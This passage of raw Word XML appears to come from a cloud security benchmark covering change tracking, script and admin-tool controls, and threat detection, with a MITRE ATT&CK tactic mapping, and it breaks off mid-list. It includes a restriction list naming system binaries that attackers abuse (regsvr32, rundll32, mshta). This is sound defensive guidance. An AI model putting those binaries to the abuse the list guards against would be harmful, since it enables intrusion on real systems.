        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Monitor software and configuration changes through these capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E11D20" w14:textId="2C54E292" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Change tracking capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5F2EA" w14:textId="771BE680" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Software inventory collection: Automated collection of installed software including application names, versions, publishers, and installation dates across Windows and Linux virtual machines using Azure Monitor Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1A53C" w14:textId="141EAAB0" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>File change monitoring: Track changes to critical files and directories detecting unauthorized software installation, configuration modifications, and malware deployment with configurable file path monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8681F" w14:textId="6C1374BB" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Windows service monitoring: Monitor Windows service changes detecting unauthorized service installations and configuration modifications indicating malware or persistence mechanisms with configurable collection frequency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2427F3" w14:textId="2CC284D9" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Registry change tracking: Windows registry monitoring detecting persistence mechanisms, configuration changes, and malware-related registry modifications with support for HKEY_LOCAL_MACHINE registry hives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AFE9B" w14:textId="5FD4A6F4" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t xml:space="preserve">Linux daemon monitoring: Track Linux daemon and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051179C">
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051179C">
        <w:t xml:space="preserve"> service changes identifying unauthorized background processes and persistence mechanisms across supported Linux distributions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B94B2D9" w14:textId="577E0066" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:lastRenderedPageBreak/>
        <w:t>Inventory analysis and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C021E99" w14:textId="04C83904" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Software approval comparison: Compare discovered software against approved application catalog identifying unapproved applications requiring investigation or removal through Log Analytics queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D365D" w14:textId="52ED2D4D" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Vulnerability correlation: Correlate software inventory with vulnerability databases identifying outdated software requiring patching or replacement integrated with Microsoft Defender Vulnerability Management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A349B" w14:textId="5CFC23A0" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Change alert rules: Configure Azure Monitor alert rules triggering notifications when critical files change, unauthorized software installs, or registry modifications occur with customizable thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F46663" w14:textId="237E4437" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Log Analytics integration: Change tracking data automatically stored in Log Analytics workspace enabling advanced KQL queries, Azure Workbooks dashboards, and Microsoft Sentinel correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64945499" w14:textId="7D8FE367" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="0051179C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-5.3: Control script execution and administrative tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6855B" w14:textId="09C0DB86" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Control scripting and administrative access through these restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F74901" w14:textId="0B79A0D3" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Script execution controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA865A4" w14:textId="4437D731" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>PowerShell execution policy: Configure PowerShell execution policy requiring script signing for remote scripts while maintaining flexibility for signed administrative scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384DF0E" w14:textId="7B0B2693" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>PowerShell Constrained Language Mode: Deploy PowerShell Constrained Language Mode limiting PowerShell capabilities preventing malicious script execution while allowing approved administrative tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDB8B6" w14:textId="695C1F4E" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Script block logging: Enable PowerShell Script Block Logging capturing all executed PowerShell code for security monitoring and forensic investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529C396" w14:textId="10BE707A" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Just Enough Administration (JEA): Implement Just Enough Administration endpoints limiting administrative PowerShell capabilities to specific approved cmdlets and parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC461AC" w14:textId="3A918F44" w:rsidR="0051179C" w:rsidRDefault="0051179C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Administrative tool restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01687437" w14:textId="764D1352" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Windows Defender Application Control (WDAC): Deploy Windows Defender Application Control policies allowing only approved administrative tools, system utilities, and business applications to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5BD6AD" w14:textId="530EC545" w:rsidR="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>AppLocker rule configuration: Configure AppLocker publisher rules, path rules, and hash rules controlling execution of administrative tools and utilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B6223" w14:textId="38E6EAB7" w:rsidR="0051179C" w:rsidRPr="0051179C" w:rsidRDefault="0051179C" w:rsidP="00AF63DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0051179C">
        <w:t>Living-off-the-land binary (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051179C">
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051179C">
        <w:t xml:space="preserve">) controls: Restrict execution of system binaries commonly abused by attackers including regsvr32, rundll32, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051179C">
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051179C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B9C55" w14:textId="77777777" w:rsidR="000E0219" w:rsidRDefault="000E0219" w:rsidP="000E0219"/>
    <w:p w14:paraId="78D5FC26" w14:textId="0DA4EF1D" w:rsidR="00FA74C0" w:rsidRDefault="00D32901" w:rsidP="00D32901">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc242449522"/>
      <w:r w:rsidRPr="00D32901">
        <w:lastRenderedPageBreak/>
        <w:t>Logging and Threat Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="2CFC108C" w14:textId="371B4532" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc242449523"/>
      <w:r w:rsidRPr="00D32901">
        <w:t>Enable detection capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="1D4629EA" w14:textId="7605544A" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc242449524"/>
      <w:r w:rsidRPr="00D32901">
        <w:t>LT-1: Enable threat detection capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="4A98B64F" w14:textId="17BA79E5" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1C499" w14:textId="12460CBF" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Enable threat detection capabilities across compute, storage, database, and identity services to identify known attack patterns, anomalous behaviors, and suspicious activities. Use behavioral analytics and threat intelligence to detect threats that traditional access controls cannot prevent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAEAE0" w14:textId="05880E68" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D32901">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62C0FFA1" w14:textId="162E667C" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Undetected malware &amp; exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DE206" w14:textId="6B8BBC37" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Malicious files uploaded to storage or exploitation attempts against databases proceed undetected because signature-based or network-layer defenses miss sophisticated payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2FDA7" w14:textId="3B0399DB" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Silent data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676FF421" w14:textId="410D8845" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Large-scale data extraction, unusual query patterns, or anomalous access volumes evade detection due to absent behavioral baselines and volume anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699092CF" w14:textId="48B4B3A1" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Lateral movement blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6E33E" w14:textId="239C6969" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Attackers pivot across resources (storage to compute to database) without triggering alerts because cross-service correlation and threat intelligence feeds are not integrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D9E4F" w14:textId="4BBE92C3" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>SQL injection &amp; application attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D1A40" w14:textId="684B1047" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t xml:space="preserve">Database exploitation attempts via malicious </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D32901">
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D32901">
        <w:t xml:space="preserve"> or application-layer attacks proceed unmonitored without real-time query analysis and threat pattern matching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFFDDE" w14:textId="6D9A9A36" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Prolonged dwell time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6F8AE" w14:textId="51028077" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Attackers maintain persistent access for extended periods (days to months) because reconnaissance, staging, and execution phases generate no alerts—delaying incident response and escalating breach impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03F069" w14:textId="40764DD7" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Insider threat opacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7EDDDF" w14:textId="5DC5E47A" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Malicious or negligent insider activities blend with legitimate traffic patterns absent user behavior analytics (UBA) and anomaly detection specific to privileged access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC71E12" w14:textId="612A9DA8" w:rsidR="00D32901" w:rsidRDefault="00D32901">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B09F22" w14:textId="6FD31CEB" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E55DF" w14:textId="0C5A21D0" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:lastRenderedPageBreak/>
        <w:t>exploit public-facing application (T1190) leveraging undetected vulnerabilities in web applications or APIs to gain initial foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBE91D" w14:textId="261E2393" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DA0E4" w14:textId="347F7BA8" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>command and scripting interpreter (T1059) executing malicious code within compute or serverless resources without triggering behavioral alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B7021" w14:textId="36AC3BBE" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026B1CA" w14:textId="60D8D08F" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t xml:space="preserve">account manipulation (T1098) modifying service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C28FE">
        <w:t xml:space="preserve"> or creating backdoor identities undetected due to absent anomaly monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE514C" w14:textId="637B68A4" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F24C8F" w14:textId="1342A753" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>impair defenses (T1562) disabling logging, monitoring agents, or security services to operate in blind spots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59251249" w14:textId="7EC21C92" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2AF55" w14:textId="40735AFA" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>data from cloud storage (T1530) silently harvesting blob containers or object storage without volume or pattern-based detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E38C9E3" w14:textId="0A96E40A" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D1E9B" w14:textId="22D38986" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>exfiltration over web service (T1567) streaming data through legitimate API endpoints at volumes or times that behavioral analytics would flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A0ABED" w14:textId="55C97CC2" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00061FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D32901">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
